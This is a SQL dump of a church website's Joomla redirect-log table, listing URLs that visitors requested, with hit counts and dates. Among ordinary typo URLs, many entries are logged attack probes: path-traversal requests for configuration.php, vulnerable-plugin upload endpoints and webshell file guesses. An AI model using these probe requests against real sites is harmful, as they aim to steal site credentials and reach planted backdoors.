(10409, 'https://lifeoasisinternationalchurch.org/priivate', NULL, '', '', 1, 0, '2019-03-02 09:53:43', '0000-00-00 00:00:00', 301),
(10410, 'https://www.lifeoasisinternationalchurch.org/resources/priva', NULL, '', '', 1, 0, '2019-03-02 11:28:23', '0000-00-00 00:00:00', 301),
(10411, 'https://lifeoasisinternationalchurch.org/pricate', NULL, '', '', 1, 0, '2019-03-02 11:43:32', '0000-00-00 00:00:00', 301),
(10412, 'https://www.lifeoasisinternationalchurch.org/aa.php', NULL, '', '', 1, 0, '2019-03-02 20:49:08', '0000-00-00 00:00:00', 301),
(10413, 'https://www.lifeoasisinternationalchurch.org/ao.php', NULL, '', '', 1, 0, '2019-03-03 00:17:36', '0000-00-00 00:00:00', 301),
(10414, 'https://www.lifeoasisinternationalchurch.org/at.php', NULL, '', '', 1, 0, '2019-03-03 01:29:25', '0000-00-00 00:00:00', 301),
(10415, 'https://www.lifeoasisinternationalchurch.org/bb.php', NULL, '', '', 1, 0, '2019-03-03 03:23:52', '0000-00-00 00:00:00', 301),
(10416, 'https://lifeoasisinternationalchurch.org/resource/live-streaming', NULL, '', '', 3, 0, '2019-03-03 06:59:19', '0000-00-00 00:00:00', 301),
(10417, 'https://www.lifeoasisinternationalchurch.org/cf.php', NULL, '', '', 1, 0, '2019-03-03 10:30:39', '0000-00-00 00:00:00', 301),
(10418, 'https://www.lifeoasisinternationalchurch.org/dl.php', NULL, '', '', 1, 0, '2019-03-03 18:37:00', '0000-00-00 00:00:00', 301),
(10419, 'https://www.lifeoasisinternationalchurch.org/dp.php', NULL, '', '', 1, 0, '2019-03-03 19:44:54', '0000-00-00 00:00:00', 301),
(10420, 'https://www.lifeoasisinternationalchurch.org/dr.php', NULL, '', '', 1, 0, '2019-03-03 20:18:13', '0000-00-00 00:00:00', 301),
(10421, 'https://www.lifeoasisinternationalchurch.org/dv.php', NULL, '', '', 1, 0, '2019-03-03 21:22:40', '0000-00-00 00:00:00', 301),
(10422, 'https://www.lifeoasisinternationalchurch.org/eh.php', NULL, '', '', 1, 0, '2019-03-04 00:41:34', '0000-00-00 00:00:00', 301),
(10423, 'https://www.lifeoasisinternationalchurch.org/eo.php', NULL, '', '', 1, 0, '2019-03-04 02:48:24', '0000-00-00 00:00:00', 301),
(10424, 'https://www.lifeoasisinternationalchurch.org/es.php', NULL, '', '', 1, 0, '2019-03-04 03:59:39', '0000-00-00 00:00:00', 301),
(10425, 'https://www.lifeoasisinternationalchurch.org/fg.php', NULL, '', '', 1, 0, '2019-03-04 08:22:15', '0000-00-00 00:00:00', 301),
(10426, 'https://www.lifeoasisinternationalchurch.org/fh.php', NULL, '', '', 1, 0, '2019-03-04 08:43:24', '0000-00-00 00:00:00', 301),
(10427, 'https://www.lifeoasisinternationalchurch.org/fy.php', NULL, '', '', 1, 0, '2019-03-04 13:59:01', '0000-00-00 00:00:00', 301),
(10428, 'https://www.lifeoasisinternationalchurch.org/fz.php', NULL, '', '', 1, 0, '2019-03-04 14:14:22', '0000-00-00 00:00:00', 301),
(10429, 'https://www.lifeoasisinternationalchurch.org/gc.php', NULL, '', '', 1, 0, '2019-03-04 15:11:32', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(10430, 'https://www.lifeoasisinternationalchurch.org/gl.php', NULL, '', '', 1, 0, '2019-03-04 18:04:18', '0000-00-00 00:00:00', 301),
(10431, 'https://www.lifeoasisinternationalchurch.org/ha.php', NULL, '', '', 1, 0, '2019-03-04 22:43:33', '0000-00-00 00:00:00', 301),
(10432, 'https://lifeoasisinternationalchurch.org/careers', NULL, '', '', 2, 0, '2019-03-04 23:27:28', '0000-00-00 00:00:00', 301),
(10433, 'https://lifeoasisinternationalchurch.org/jobs', NULL, '', '', 4, 0, '2019-03-04 23:27:29', '0000-00-00 00:00:00', 301),
(10434, 'https://www.lifeoasisinternationalchurch.org/hd.php', NULL, '', '', 1, 0, '2019-03-04 23:40:41', '0000-00-00 00:00:00', 301),
(10435, 'https://www.lifeoasisinternationalchurch.org/he.php', NULL, '', '', 1, 0, '2019-03-04 23:56:05', '0000-00-00 00:00:00', 301),
(10436, 'https://www.lifeoasisinternationalchurch.org/hf.php', NULL, '', '', 1, 0, '2019-03-05 00:15:06', '0000-00-00 00:00:00', 301),
(10437, 'https://www.lifeoasisinternationalchurch.org/hg.php', NULL, '', '', 1, 0, '2019-03-05 00:36:33', '0000-00-00 00:00:00', 301),
(10438, 'https://www.lifeoasisinternationalchurch.org/hy.php', NULL, '', '', 1, 0, '2019-03-05 05:23:47', '0000-00-00 00:00:00', 301),
(10439, 'https://www.lifeoasisinternationalchurch.org/ib.php', NULL, '', '', 1, 0, '2019-03-05 06:08:56', '0000-00-00 00:00:00', 301),
(10440, 'https://www.lifeoasisinternationalchurch.org/id.php', NULL, '', '', 1, 0, '2019-03-05 06:42:58', '0000-00-00 00:00:00', 301),
(10441, 'https://www.lifeoasisinternationalchurch.org/ie.php', NULL, '', '', 1, 0, '2019-03-05 06:55:22', '0000-00-00 00:00:00', 301),
(10442, 'https://www.lifeoasisinternationalchurch.org/ih.php', NULL, '', '', 1, 0, '2019-03-05 07:44:43', '0000-00-00 00:00:00', 301),
(10443, 'https://www.lifeoasisinternationalchurch.org/ij.php', NULL, '', '', 1, 0, '2019-03-05 08:16:55', '0000-00-00 00:00:00', 301),
(10444, 'https://www.lifeoasisinternationalchurch.org/io.php', NULL, '', '', 1, 0, '2019-03-05 09:50:17', '0000-00-00 00:00:00', 301),
(10445, 'https://www.lifeoasisinternationalchurch.org/iq.php', NULL, '', '', 1, 0, '2019-03-05 10:21:11', '0000-00-00 00:00:00', 301),
(10446, 'https://www.lifeoasisinternationalchurch.org/iu.php', NULL, '', '', 1, 0, '2019-03-05 11:28:05', '0000-00-00 00:00:00', 301),
(10447, 'https://lifeoasisinternationalchurch.org/women congress', NULL, '', '', 1, 0, '2019-03-05 11:40:58', '0000-00-00 00:00:00', 301),
(10448, 'https://www.lifeoasisinternationalchurch.org/ji.php', NULL, '', '', 1, 0, '2019-03-05 15:13:37', '0000-00-00 00:00:00', 301),
(10449, 'https://www.lifeoasisinternationalchurch.org/jo.php', NULL, '', '', 1, 0, '2019-03-05 16:51:57', '0000-00-00 00:00:00', 301),
(10450, 'https://www.lifeoasisinternationalchurch.org/jp.php', NULL, '', '', 1, 0, '2019-03-05 17:10:00', '0000-00-00 00:00:00', 301),
(10451, 'https://www.lifeoasisinternationalchurch.org/jv.php', NULL, '', '', 1, 0, '2019-03-05 18:45:01', '0000-00-00 00:00:00', 301),
(10452, 'https://www.lifeoasisinternationalchurch.org/jx.php', NULL, '', '', 1, 0, '2019-03-05 19:21:06', '0000-00-00 00:00:00', 301),
(10453, 'https://www.lifeoasisinternationalchurch.org/jy.php', NULL, '', '', 1, 0, '2019-03-05 19:35:46', '0000-00-00 00:00:00', 301),
(10454, 'https://www.lifeoasisinternationalchurch.org/kd.php', NULL, '', '', 1, 0, '2019-03-05 20:55:55', '0000-00-00 00:00:00', 301),
(10455, 'https://www.lifeoasisinternationalchurch.org/ki.php', NULL, '', '', 1, 0, '2019-03-05 22:13:54', '0000-00-00 00:00:00', 301),
(10456, 'https://www.lifeoasisinternationalchurch.org/kq.php', NULL, '', '', 1, 0, '2019-03-06 00:20:33', '0000-00-00 00:00:00', 301),
(10457, 'https://www.lifeoasisinternationalchurch.org/kt.php', NULL, '', '', 1, 0, '2019-03-06 01:10:11', '0000-00-00 00:00:00', 301),
(10458, 'https://www.lifeoasisinternationalchurch.org/kw.php', NULL, '', '', 1, 0, '2019-03-06 01:57:16', '0000-00-00 00:00:00', 301),
(10459, 'https://www.lifeoasisinternationalchurch.org/lc.php', NULL, '', '', 1, 0, '2019-03-06 03:32:22', '0000-00-00 00:00:00', 301),
(10460, 'https://www.lifeoasisinternationalchurch.org/lf.php', NULL, '', '', 1, 0, '2019-03-06 04:22:03', '0000-00-00 00:00:00', 301),
(10461, 'https://www.lifeoasisinternationalchurch.org/lh.php', NULL, '', '', 1, 0, '2019-03-06 04:52:50', '0000-00-00 00:00:00', 301),
(10462, 'https://lifeoasisinternationalchurch.org/career', NULL, '', '', 2, 0, '2019-03-06 05:43:15', '0000-00-00 00:00:00', 301),
(10463, 'https://lifeoasisinternationalchurch.org/apply', NULL, '', '', 2, 0, '2019-03-06 05:43:25', '0000-00-00 00:00:00', 301),
(10464, 'https://lifeoasisinternationalchurch.org/openings', NULL, '', '', 2, 0, '2019-03-06 05:43:38', '0000-00-00 00:00:00', 301),
(10465, 'https://lifeoasisinternationalchurch.org/vacancies', NULL, '', '', 2, 0, '2019-03-06 05:43:53', '0000-00-00 00:00:00', 301),
(10466, 'https://www.lifeoasisinternationalchurch.org/lm.php', NULL, '', '', 1, 0, '2019-03-06 06:17:50', '0000-00-00 00:00:00', 301),
(10467, 'https://lifeoasisinternationalchurch.org/ccnggqsf.htm', NULL, '', '', 1, 0, '2019-03-06 07:12:56', '0000-00-00 00:00:00', 301),
(10468, 'https://www.lifeoasisinternationalchurch.org/ayhsmhax.htm', NULL, '', '', 1, 0, '2019-03-06 07:12:58', '0000-00-00 00:00:00', 301),
(10469, 'https://www.lifeoasisinternationalchurch.org/lq.php', NULL, '', '', 1, 0, '2019-03-06 07:19:48', '0000-00-00 00:00:00', 301),
(10470, 'https://www.lifeoasisinternationalchurch.org/lx.php', NULL, '', '', 1, 0, '2019-03-06 09:10:06', '0000-00-00 00:00:00', 301),
(10471, 'https://www.lifeoasisinternationalchurch.org/lz.php', NULL, '', '', 1, 0, '2019-03-06 09:42:49', '0000-00-00 00:00:00', 301),
(10472, 'https://www.lifeoasisinternationalchurch.org/mt.php', NULL, '', '', 1, 0, '2019-03-06 15:11:23', '0000-00-00 00:00:00', 301),
(10473, 'https://www.lifeoasisinternationalchurch.org/nl.php', NULL, '', '', 1, 0, '2019-03-06 19:59:14', '0000-00-00 00:00:00', 301),
(10474, 'https://www.lifeoasisinternationalchurch.org/nx.php', NULL, '', '', 1, 0, '2019-03-06 23:06:45', '0000-00-00 00:00:00', 301),
(10475, 'https://www.lifeoasisinternationalchurch.org/ok.php', NULL, '', '', 1, 0, '2019-03-07 02:25:14', '0000-00-00 00:00:00', 301),
(10476, 'https://www.lifeoasisinternationalchurch.org/pc.php', NULL, '', '', 1, 0, '2019-03-07 06:58:00', '0000-00-00 00:00:00', 301),
(10477, 'https://www.lifeoasisinternationalchurch.org/pt.php', NULL, '', '', 1, 0, '2019-03-07 11:25:41', '0000-00-00 00:00:00', 301),
(10478, 'https://www.lifeoasisinternationalchurch.org/pu.php', NULL, '', '', 1, 0, '2019-03-07 11:40:38', '0000-00-00 00:00:00', 301),
(10479, 'https://www.lifeoasisinternationalchurch.org/pz.php', NULL, '', '', 1, 0, '2019-03-07 12:58:57', '0000-00-00 00:00:00', 301),
(10480, 'https://www.lifeoasisinternationalchurch.org/qg.php', NULL, '', '', 1, 0, '2019-03-07 14:48:14', '0000-00-00 00:00:00', 301),
(10481, 'https://www.lifeoasisinternationalchurch.org/qn.php', NULL, '', '', 1, 0, '2019-03-07 16:36:21', '0000-00-00 00:00:00', 301),
(10482, 'https://www.lifeoasisinternationalchurch.org/qt.php', NULL, '', '', 1, 0, '2019-03-07 18:11:36', '0000-00-00 00:00:00', 301),
(10483, 'https://www.lifeoasisinternationalchurch.org/qv.php', NULL, '', '', 1, 0, '2019-03-07 18:40:35', '0000-00-00 00:00:00', 301),
(10484, 'https://www.lifeoasisinternationalchurch.org/qw.php', NULL, '', '', 1, 0, '2019-03-07 18:57:49', '0000-00-00 00:00:00', 301),
(10485, 'https://www.lifeoasisinternationalchurch.org/qy.php', NULL, '', '', 1, 0, '2019-03-07 19:29:34', '0000-00-00 00:00:00', 301),
(10486, 'https://www.lifeoasisinternationalchurch.org/rg.php', NULL, '', '', 1, 0, '2019-03-07 21:35:25', '0000-00-00 00:00:00', 301),
(10487, 'https://www.lifeoasisinternationalchurch.org/rn.php', NULL, '', '', 1, 0, '2019-03-07 23:22:00', '0000-00-00 00:00:00', 301),
(10488, 'https://www.lifeoasisinternationalchurch.org/rp.php', NULL, '', '', 1, 0, '2019-03-07 23:52:45', '0000-00-00 00:00:00', 301),
(10489, 'https://www.lifeoasisinternationalchurch.org/rz.php', NULL, '', '', 1, 0, '2019-03-08 02:24:12', '0000-00-00 00:00:00', 301),
(10490, 'https://www.lifeoasisinternationalchurch.org/se.php', NULL, '', '', 1, 0, '2019-03-08 03:39:32', '0000-00-00 00:00:00', 301),
(10491, 'https://www.lifeoasisinternationalchurch.org/ss.php', NULL, '', '', 1, 0, '2019-03-08 07:16:58', '0000-00-00 00:00:00', 301),
(10492, 'https://www.lifeoasisinternationalchurch.org/tc.php', NULL, '', '', 1, 0, '2019-03-08 09:49:38', '0000-00-00 00:00:00', 301),
(10493, 'https://www.lifeoasisinternationalchurch.org/uj.php', NULL, '', '', 1, 0, '2019-03-08 19:08:24', '0000-00-00 00:00:00', 301),
(10494, 'https://www.lifeoasisinternationalchurch.org/us.php', NULL, '', '', 1, 0, '2019-03-08 21:46:33', '0000-00-00 00:00:00', 301),
(10495, 'https://www.lifeoasisinternationalchurch.org/ux.php', NULL, '', '', 1, 0, '2019-03-08 23:09:08', '0000-00-00 00:00:00', 301),
(10496, 'https://www.lifeoasisinternationalchurch.org/vg.php', NULL, '', '', 1, 0, '2019-03-09 01:40:49', '0000-00-00 00:00:00', 301),
(10497, 'https://www.lifeoasisinternationalchurch.org/vn.php', NULL, '', '', 1, 0, '2019-03-09 03:38:30', '0000-00-00 00:00:00', 301),
(10498, 'https://www.lifeoasisinternationalchurch.org/vo.php', NULL, '', '', 1, 0, '2019-03-09 03:54:25', '0000-00-00 00:00:00', 301),
(10499, 'https://www.lifeoasisinternationalchurch.org/vs.php', NULL, '', '', 1, 0, '2019-03-09 05:01:14', '0000-00-00 00:00:00', 301),
(10500, 'https://www.lifeoasisinternationalchurch.org/wb.php', NULL, '', '', 1, 0, '2019-03-09 07:35:47', '0000-00-00 00:00:00', 301),
(10501, 'https://www.lifeoasisinternationalchurch.org/wc.php', NULL, '', '', 1, 0, '2019-03-09 07:53:37', '0000-00-00 00:00:00', 301),
(10502, 'https://www.lifeoasisinternationalchurch.org/wh.php', NULL, '', '', 1, 0, '2019-03-09 09:20:49', '0000-00-00 00:00:00', 301),
(10503, 'https://www.lifeoasisinternationalchurch.org/wp.php', NULL, '', '', 1, 0, '2019-03-09 11:34:41', '0000-00-00 00:00:00', 301),
(10504, 'https://www.lifeoasisinternationalchurch.org/wy.php', NULL, '', '', 1, 0, '2019-03-09 14:13:30', '0000-00-00 00:00:00', 301),
(10505, 'https://www.lifeoasisinternationalchurch.org/xz.php', NULL, '', '', 1, 0, '2019-03-09 21:32:54', '0000-00-00 00:00:00', 301),
(10506, 'https://www.lifeoasisinternationalchurch.org/ya.php', NULL, '', '', 1, 0, '2019-03-09 21:48:19', '0000-00-00 00:00:00', 301),
(10507, 'https://lifeoasisinternationalchurch.org/component/content/article/12-sample-content/', NULL, '', '', 2, 0, '2019-03-09 23:09:14', '0000-00-00 00:00:00', 301),
(10508, 'https://www.lifeoasisinternationalchurch.org/yx.php', NULL, '', '', 1, 0, '2019-03-10 03:54:28', '0000-00-00 00:00:00', 301),
(10509, 'https://www.lifeoasisinternationalchurch.org/zd.php', NULL, '', '', 1, 0, '2019-03-10 05:27:08', '0000-00-00 00:00:00', 301),
(10510, 'https://www.lifeoasisinternationalchurch.org/zl.php', NULL, '', '', 1, 0, '2019-03-10 07:26:58', '0000-00-00 00:00:00', 301),
(10511, 'https://www.lifeoasisinternationalchurch.org/zx.php', NULL, '', '', 1, 0, '2019-03-10 10:26:23', '0000-00-00 00:00:00', 301),
(10512, 'https://lifeoasisinternationalchurch.org/strraming', NULL, '', '', 1, 0, '2019-03-10 10:43:12', '0000-00-00 00:00:00', 301),
(10513, 'https://www.lifeoasisinternationalchurch.org/zz.php', NULL, '', '', 1, 0, '2019-03-10 10:55:18', '0000-00-00 00:00:00', 301),
(10514, 'https://lifeoasisinternationalchurch.org//components/com_jbcatalog/libraries/jsupload/server/php', NULL, '', '', 2, 0, '2019-03-11 21:48:10', '0000-00-00 00:00:00', 301),
(10515, 'https://lifeoasisinternationalchurch.org//components/com_sexycontactform/fileupload/', NULL, '', '', 2, 0, '2019-03-11 21:48:20', '0000-00-00 00:00:00', 301),
(10516, 'https://lifeoasisinternationalchurch.org/resources/live-streaming//private', NULL, '', '', 1, 0, '2019-03-11 22:53:47', '0000-00-00 00:00:00', 301),
(10517, 'https://lifeoasisinternationalchurch.org/resources/live-streaming private', NULL, '', '', 1, 0, '2019-03-11 22:54:02', '0000-00-00 00:00:00', 301),
(10518, 'https://www.lifeoasisinternationalchurch.org/site/index.php?option=com_users&view=registration/component/users/?view=login&itemid=101', NULL, '', '', 2, 0, '2019-03-12 06:41:12', '0000-00-00 00:00:00', 301),
(10519, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=registration/component/users/?view=login&itemid=101', NULL, '', '', 2, 0, '2019-03-12 06:48:49', '0000-00-00 00:00:00', 301),
(10520, 'https://www.lifeoasisinternationalchurch.org/login/signup.php', NULL, '', '', 2, 0, '2019-03-12 10:13:52', '0000-00-00 00:00:00', 301),
(10521, 'https://www.lifeoasisinternationalchurch.org/index.php/component/users/?view=registration/component/users/?view=login&itemid=101', NULL, '', '', 2, 0, '2019-03-12 10:33:55', '0000-00-00 00:00:00', 301),
(10522, 'https://www.lifeoasisinternationalchurch.org/index.php/register/', NULL, '', '', 2, 0, '2019-03-12 11:02:12', '0000-00-00 00:00:00', 301),
(10523, 'https://142.4.21.132//admin/config.php', NULL, '', '', 1, 0, '2019-03-12 11:46:13', '0000-00-00 00:00:00', 301),
(10524, 'https://www.lifeoasisinternationalchurch.org/extensions/components/users-component/registration-form', NULL, '', '', 2, 0, '2019-03-12 15:51:04', '0000-00-00 00:00:00', 301),
(10525, 'https://www.lifeoasisinternationalchurch.org/index.php/user-profile?view=registration', NULL, '', '', 2, 0, '2019-03-13 06:38:06', '0000-00-00 00:00:00', 301),
(10526, 'https://www.lifeoasisinternationalchurch.org/streaming00', NULL, '', '', 1, 0, '2019-03-13 16:07:07', '0000-00-00 00:00:00', 301),
(10527, 'https://lifeoasisinternationalchurch.org/)', NULL, '', '', 2, 0, '2019-03-14 09:42:49', '0000-00-00 00:00:00', 301),
(10528, 'https://lifeoasisinternationalchurch.org:443/wp-json/', NULL, '', '', 1, 0, '2019-03-14 17:00:20', '0000-00-00 00:00:00', 301),
(10529, 'https://www.lifeoasisinternationalchurch.org/resourcyes/live-streaming', NULL, '', '', 1, 0, '2019-03-15 17:49:43', '0000-00-00 00:00:00', 301),
(10530, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming women congress', NULL, '', '', 1, 0, '2019-03-16 08:44:31', '0000-00-00 00:00:00', 301),
(10531, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketx&requestdata=[{\"train_date\":\"20190323\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"ec692bc2fe86df09933a7508b8d7ebb6\",\"device_no\":\"91902d21e51b33f4042ff9c9bca4aba2\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190318182100\",\"user_name\":\"\",\"version_no\":\"4.1.9\"}}]&ts=1552904460303&sign=', NULL, '', '', 1, 0, '2019-03-18 10:21:07', '0000-00-00 00:00:00', 301),
(10532, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20190323\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"f46b98d3ea4121179110bb4cd26d4925\",\"device_no\":\"c0b6bd40fead57beff43d8322f1a83e5\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190318204744\",\"user_name\":\"\",\"version_no\":\"4.1.9\"}}]&ts=1552913264321&sign=', NULL, '', '', 1, 0, '2019-03-18 12:47:43', '0000-00-00 00:00:00', 301),
(10533, 'https://mail.lifeoasisinternationalchurch.org/imp/test.php', NULL, '', '', 6, 0, '2019-03-18 18:17:17', '0000-00-00 00:00:00', 301),
(10534, 'https://mail.lifeoasisinternationalchurch.org/horde/imp/test.php', NULL, '', '', 6, 0, '2019-03-18 18:17:17', '0000-00-00 00:00:00', 301),
(10535, 'https://mail.lifeoasisinternationalchurch.org/horde3/imp/test.php', NULL, '', '', 6, 0, '2019-03-18 18:17:18', '0000-00-00 00:00:00', 301),
(10536, 'https://mail.lifeoasisinternationalchurch.org/admin/login.php', NULL, '', '', 1, 0, '2019-03-21 14:01:55', '0000-00-00 00:00:00', 301),
(10537, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 1, 0, '2019-03-21 14:02:03', '0000-00-00 00:00:00', 301),
(10538, 'https://mail.lifeoasisinternationalchurch.org/administrator/components/com_alberghi/upload.alberghi.php', NULL, '', '', 1, 0, '2019-03-21 14:02:05', '0000-00-00 00:00:00', 301),
(10539, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_cckjseblod&task=download&file=configuration.php', NULL, '', '', 1, 0, '2019-03-21 14:02:07', '0000-00-00 00:00:00', 301),
(10540, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=', NULL, '', '', 1, 0, '2019-03-21 14:02:10', '0000-00-00 00:00:00', 301),
(10541, 'https://mail.lifeoasisinternationalchurch.org/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php', NULL, '', '', 1, 0, '2019-03-21 14:02:13', '0000-00-00 00:00:00', 301),
(10542, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_jdownloads&itemid=0&view=upload', NULL, '', '', 2, 0, '2019-03-21 14:02:15', '0000-00-00 00:00:00', 301),
(10543, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php', NULL, '', '', 1, 0, '2019-03-21 14:02:20', '0000-00-00 00:00:00', 301),
(10544, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2019-03-21 14:02:21', '0000-00-00 00:00:00', 301),
(10545, 'https://mail.lifeoasisinternationalchurch.org/index.php?option=com_macgallery&view=download&albumid=../../configuration.php', NULL, '', '', 1, 0, '2019-03-21 14:02:23', '0000-00-00 00:00:00', 301),
(10546, 'https://mail.lifeoasisinternationalchurch.org/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=', NULL, '', '', 1, 0, '2019-03-21 14:02:31', '0000-00-00 00:00:00', 301),
(10547, 'https://lifeoasisinternationalchurch.org/contact', NULL, '', '', 1, 0, '2019-03-22 15:19:41', '0000-00-00 00:00:00', 301),
(10548, 'https://lifeoasisinternationalchurch.org/contacts', NULL, '', '', 1, 0, '2019-03-22 15:19:41', '0000-00-00 00:00:00', 301),
(10549, 'https://lifeoasisinternationalchurch.org/jsspwned.html', NULL, '', '', 1, 0, '2019-03-22 19:08:22', '0000-00-00 00:00:00', 301),
(10550, 'https://www.lifeoasisinternationalchurch.org/apply', NULL, '', '', 1, 0, '2019-03-23 02:43:52', '0000-00-00 00:00:00', 301),
(10551, 'https://lifeoasisinternationalchurch.org/%3f/', NULL, '', '', 1, 0, '2019-03-23 07:32:23', '0000-00-00 00:00:00', 301),
(10552, 'https://lifeoasisinternationalchurch.org/x.php', NULL, 'https://lifeoasisinternationalchurch.org/x.php', '', 5, 0, '2019-03-23 20:38:55', '0000-00-00 00:00:00', 301),
(10553, 'https://www.lifeoasisinternationalchurch.org/pastormeetingstraining', NULL, '', '', 1, 0, '2019-03-24 05:16:18', '0000-00-00 00:00:00', 301),
(10554, 'https://www.lifeoasisinternationalchurch.org/strr', NULL, '', '', 1, 0, '2019-03-24 11:09:39', '0000-00-00 00:00:00', 301),
(10555, 'https://www.lifeoasisinternationalchurch.org/strrw', NULL, '', '', 1, 0, '2019-03-24 11:09:47', '0000-00-00 00:00:00', 301),
(10556, 'https://www.lifeoasisinternationalchurch.org/treaming', NULL, '', '', 1, 0, '2019-03-24 11:09:55', '0000-00-00 00:00:00', 301),
(10557, 'https://142.4.21.132/version', NULL, '', '', 8, 0, '2019-03-25 15:16:26', '0000-00-00 00:00:00', 301),
(10558, 'https://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/21-prayer-a-fasting-day-12', NULL, '', '', 1, 0, '2019-03-26 11:24:24', '0000-00-00 00:00:00', 301),
(10559, 'https://lifeoasisinternationalchurch.org/adminer/', NULL, '', '', 2, 0, '2019-03-26 13:25:21', '0000-00-00 00:00:00', 301),
(10560, 'https://lifeoasisinternationalchurch.org//application/component/view-base64.php', NULL, '', '', 1, 0, '2019-03-27 02:47:05', '0000-00-00 00:00:00', 301),
(10561, 'https://lifeoasisinternationalchurch.org/streamibg', NULL, '', '', 1, 0, '2019-03-27 17:34:09', '0000-00-00 00:00:00', 301),
(10562, 'https://www.lifeoasisinternationalchurch.org//webconfig.txt.php', NULL, 'http://www.google.com.hk', '', 6, 0, '2019-03-27 18:42:54', '0000-00-00 00:00:00', 301),
(10563, 'https://www.lifeoasisinternationalchurch.org///webconfig.txt.php', NULL, 'http://www.google.com.hk', '', 6, 0, '2019-03-27 18:43:30', '0000-00-00 00:00:00', 301),
(10564, 'https://lifeoasisinternationalchurch.org//com_content/archive/engine_functions.php', NULL, '', '', 1, 0, '2019-03-27 23:54:40', '0000-00-00 00:00:00', 301),
(10565, 'https://lifeoasisinternationalchurch.org//room.php', NULL, '', '', 3, 0, '2019-03-27 23:54:42', '0000-00-00 00:00:00', 301),
(10566, 'https://lifeoasisinternationalchurch.org//js/engine_functions.php', NULL, '', '', 3, 0, '2019-03-27 23:54:45', '0000-00-00 00:00:00', 301),
(10567, 'https://lifeoasisinternationalchurch.org//wp-inc.php', NULL, '', '', 3, 0, '2019-03-27 23:54:47', '0000-00-00 00:00:00', 301),
(10568, 'https://lifeoasisinternationalchurch.org//links.php', NULL, '', '', 2, 0, '2019-03-27 23:54:50', '0000-00-00 00:00:00', 301),
(10569, 'https://lifeoasisinternationalchurch.org//media/checkpack.php', NULL, '', '', 1, 0, '2019-03-27 23:54:55', '0000-00-00 00:00:00', 301),
(10570, 'https://lifeoasisinternationalchurch.org//components/com_banners/helpers/css.php', NULL, '', '', 1, 0, '2019-03-27 23:54:57', '0000-00-00 00:00:00', 301),
(10571, 'https://lifeoasisinternationalchurch.org//media/eswc.php', NULL, '', '', 3, 0, '2019-03-27 23:55:00', '0000-00-00 00:00:00', 301),
(10572, 'https://lifeoasisinternationalchurch.org/photogallery', NULL, '', '', 4, 0, '2019-03-28 04:52:31', '0000-00-00 00:00:00', 301),
(10573, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=13&itemid=213//index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=', NULL, '', '', 2, 0, '2019-03-29 13:54:46', '0000-00-00 00:00:00', 301),
(10574, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=13&itemid=213//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1', NULL, '', '', 1, 0, '2019-03-29 13:54:58', '0000-00-00 00:00:00', 301),
(10575, 'https://lifeoasisinternationalchurch.org//webconfig.txt.php', NULL, 'http://www.google.com.hk', '', 4, 0, '2019-03-29 22:57:52', '0000-00-00 00:00:00', 301),
(10576, 'https://lifeoasisinternationalchurch.org///webconfig.txt.php', NULL, 'http://www.google.com.hk', '', 2, 0, '2019-03-29 22:59:00', '0000-00-00 00:00:00', 301),
(10577, 'https://lifeoasisinternationalchurch.org:443//xmlrpc.php?rsd', NULL, '', '', 4, 0, '2019-03-30 16:28:17', '0000-00-00 00:00:00', 301),
(10578, 'https://lifeoasisinternationalchurch.org/ stre', NULL, '', '', 2, 0, '2019-03-31 22:01:15', '0000-00-00 00:00:00', 301),
(10579, 'https://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 1, 0, '2019-04-01 04:27:29', '0000-00-00 00:00:00', 301),
(10580, 'https://lifeoasisinternationalchurch.org/php.php', NULL, 'https://LIFEOASISINTERNATIONALCHURCH.ORG/php.php', '', 4, 0, '2019-04-01 05:15:05', '0000-00-00 00:00:00', 301),
(10581, 'https://lifeoasisinternationalchurch.org//fll1/language/pdf_fonts/mod_araticlws.php', NULL, '', '', 1, 0, '2019-04-01 12:09:49', '0000-00-00 00:00:00', 301),
(10582, 'https://lifeoasisinternationalchurch.org//shell/log.php', NULL, '', '', 1, 0, '2019-04-01 12:09:52', '0000-00-00 00:00:00', 301),
